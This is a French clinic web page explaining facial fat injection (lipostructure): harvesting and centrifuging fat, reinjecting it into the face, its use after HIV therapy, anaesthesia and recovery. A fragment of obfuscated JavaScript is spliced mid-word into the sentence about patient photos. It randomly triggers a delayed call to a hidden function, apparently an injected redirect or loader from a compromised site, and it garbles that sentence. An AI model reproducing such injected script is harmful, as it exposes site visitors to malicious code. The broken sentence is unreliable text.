Une équipe au cœur de votre bien-être

Clinique Bretéché - Nantes

Injection de graisse

Appelée aussi Lipostructure

L’injection de graisse est pratiquée depuis presque 100 ans mais existe sous sa forme actuelle depuis les travaux du Dr. S. Coleman.

La pratique

Cette technique consiste à prélever par aspiration de la graisse à un endroit défini au préalable en consultation et après l’avoir centrifugée à la réinjecter au niveau du visage. Elle a pour but de reconstituer les volumes du visage sans pour autant lui donner un aspect « bouffi ».

Votre chirurgien vous demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andera à cet effet des photos de vous à 20, 30, 40 ans afin d’étudier au mieux les effets du vieillissement.

La Lipostructure® peut être pratiquée seule (pour « rénover » un lifting ancien par exemple) ou en association avec un lifting ou une chirurgie des paupières.

Cette technique est également utilisée en traitement de la lipoatrophie faciale post trithérapie VIH.

L’anesthésie suivant les cas sera générale ou locale approfondie.

Les résultats

Le résultat est en général stable, la graisse injectée se greffant au niveau de la zone souhaitée.

Les suites sont simples, essentiellement marquées par des bleus aussi bien dans la zone de prélèvement que dans la zone d’injection.

Tous ces aspects seront évoqués avec vous lors d’une consultation personnalisée qui sera à même de répondre à toutes vos interrogations.

Dernière modification : 12/11/2014